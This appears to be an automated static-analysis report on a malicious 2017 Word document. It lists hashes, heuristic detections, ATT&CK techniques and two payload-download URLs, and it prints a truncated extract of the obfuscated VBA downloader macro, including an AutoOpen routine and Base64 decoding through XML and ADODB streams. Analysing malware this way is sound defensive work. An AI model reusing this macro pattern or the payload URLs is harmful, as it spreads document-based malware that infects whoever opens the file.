Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 733ee48fefe8b9d8…

MALICIOUS

Office (OLE)

Size: 161.5 KB
Created: 2017-05-04 22:34:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 2f2346530bda054d350d7810ba84a48d
SHA-1: 693c101b4c3d93683d1521e39786e4404c440c9b
SHA-256: 733ee48fefe8b9d89a0a0ee956dde7b3272a005120f0245e85587dac3c53f0f4
Risk score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes a Base64-decoded Shell command stager to download a payload from the URLs 'monarchiste.com/hj7jq-rw947-wcgqm/' and 'http://faciusa.com/zap1fts-a367-'. The presence of the AutoOpen macro and Shell() call indicates an attempt to execute arbitrary code upon opening the document.

Heuristics (9)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager (critical, OLE_VBA_BASE64_SHELL_COMMAND_STAGER)
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs:
      • http://faciusa.com/zap1fts-a367- (referenced by macro)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16275 bytes
SHA-256: 15a0e1f60b2bf0df929952b458ad9caa402eb689c84b1938313e325ea74ef0c3

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim BpqVcmv As Byte
BpqVcmv = 66
Dim LmpPvRJ As Integer
LmpPvRJ = Sgn(-29983)
auMRvdU
End Sub

Attribute VB_Name = "Module2"
Public Function TgsoLNn6(ByVal czB0d)
Dim gp8cn17FQ As Single
gp8cn17FQ = Val(21658.693522083)
Dim qsfX5kW27 As Byte
qsfX5kW27 = 181
Dim hEAth3FfZ As Integer
hEAth3FfZ = Sgn(-20058)
Dim ke2H7bl As Byte
ke2H7bl = 208
Dim jIL0K3d5b As Byte
jIL0K3d5b = 185
Dim tZiH1ltuR
Dim Pc4zem6x

Dim jSVlb As Long
jSVlb = 0
Dim lM6kxu1 As Double
lM6kxu1 = Val(27104.520179464)
Dim wxsPaLm
wxsPaLm = Len(nNSmAlZX)
Dim KOzxbEK3P As Double
KOzxbEK3P = Val(26711.64802029)
Dim NLoKUxH
NLoKUxH = Val("k")
Dim Lzp6tn2 As Double
Lzp6tn2 = Sgn(1290.9306694619)
Dim vzV0X2C4 As Single
vzV0X2C4 = Sgn(32900.001636718)
Dim CAopY8Q As String
CAopY8Q = Val(QdTQc8)
Set tZiH1ltuR = CreateObject(mtNsyfeFR)

Dim QqV2r As Boolean
QqV2r = False
Dim zu9zw5Kc As Boolean
zu9zw5Kc = False
Dim kDqaNeiul
kDqaNeiul = AscW("Z")
Dim MzLrA8 As Byte
MzLrA8 = 37
Set Pc4zem6x = tZiH1ltuR.CreateElement(QYsqF)

Dim mF9ST As Long
mF9ST = -378508762
Dim WRrOhNxW
WRrOhNxW = Len(qK1YTP6)
Dim NY54M0Jj As Double
NY54M0Jj = Sgn(34419.575140102)
Dim dSQyF As Integer
dSQyF = Sgn(21721)
Dim DFJknmK As Single
DFJknmK = Val(26121.377714274)
With Pc4zem6x

Dim Fthiq2D6 As Boolean
Fthiq2D6 = False
Dim bEaF4 As String
bEaF4 = RTrim(QapXv)
Dim QwRH6 As Long
QwRH6 = -944345582
Pc4zem6x.DataType = "bin." & QYsqF
Dim Ek1BN As Double
Ek1BN = Sgn(51812.28946641)
Dim kcfj3 As Boolean
kcfj3 = False
Pc4zem6x.Text = czB0d
End With
Dim rnRtC As Long
rnRtC = Sgn(-1614955276)
Dim HpNIe As Double
HpNIe = 7839.5898329569
Dim iMLthiR As Integer
iMLthiR = Sgn(15758)
TgsoLNn6 = flzGVye(Pc4zem6x.nodeTypedValue)
Dim TEK7jCuT As Long
TEK7jCuT = Sgn(-1628194472)
Dim zq9PhrpmS As Long
zq9PhrpmS = 0
Dim yfeza As Boolean
yfeza = True
Dim U2mOBq As Single
U2mOBq = 48875.365939221
Set Pc4zem6x = Nothing
Set tZiH1ltuR = Nothing
End Function
Function flzGVye(Binary)
Dim uD4xh9e As Single
uD4xh9e = Sgn(11995.925908167)
Dim WEeAG As Long
WEeAG = -1524949194
Const LxNmvXRP = 2
Const mJBRi8b = 1

Dim Aor6WiA0 As Single
Aor6WiA0 = 30699.744684207
Dim RmWaMP As String
RmWaMP = StrConv(FRAFGXik3, vbProperCase)
Dim WS8o2Ycw As Long
WS8o2Ycw = Sgn(0)
Dim fozjWsmk As Double
fozjWsmk = Int(8375.9183946833)
Dim LtgXL As Single
LtgXL = Sgn(60807.549883137)
Dim IIFNM As Integer
IIFNM = -25221
Dim AiPmBRn

Dim nn6hBF3 As Byte
nn6hBF3 = 0
Dim D0LMp6i As Integer
D0LMp6i = -11466
Dim hFvKw As Double
hFvKw = Sgn(59906.987581003)
Dim f1kGj As Byte
f1kGj = 12
Dim zdCR5IzZS As Byte
zdCR5IzZS = 57
Dim lwHdnVjs As Single
lwHdnVjs = Round(64803.648897087)
Dim UMnm01Xa As Integer
UMnm01Xa = 18963
Set AiPmBRn = CreateObject("adodb.stream")

Dim NqNsTKW As Integer
NqNsTKW = 29356
Dim Kp34mW As Long
Kp34mW = Sgn(-776414280)
Dim YfP3qNLT As Byte
YfP3qNLT = 138
Dim JXfS5z2O As Long
JXfS5z2O = 0
Dim glCSuB As Byte
glCSuB = 2
With AiPmBRn
Dim uQwrXp As Long
uQwrXp = Sgn(0)
Dim UO6PHWcs As Byte
UO6PHWcs = 74
Dim rAXwWdJp
rAXwWdJp = LCase(zpcJf8ji2)
Dim IKa3cskv As Byte
IKa3cskv = 95
Dim v2i8M As String
v2i8M = StrConv(mAeh8, vbProperCase)
Dim kB0IEq6G As Long
kB0IEq6G = Sgn(0)
.Type = mJBRi8b
Dim QvEQep As Long
QvEQep = Sgn(-1255866560)
Dim OAQJjkF As Long
OAQJjkF = Sgn(0)
Dim Ilu1GFy0i As Byte
Ilu1GFy0i = 214
Dim sGrvF1P As Integer
sGrvF1P = 27393
Dim IRtIs As Single
IRtIs = Round(4252.3901083266)
.Open

Dim VSRoi As Double
VSRoi = 25144.72953493
Dim XP2zFhk As Boolean
XP2zFhk = True
Dim Qea9lA As Double
Qea9lA = Sgn(44154.480723832)
.Write Binary

Dim igpntqeFJ As Boolean
igpntqeFJ = False
Dim nk135tFCv As Single
nk135tFCv = 
... (truncated)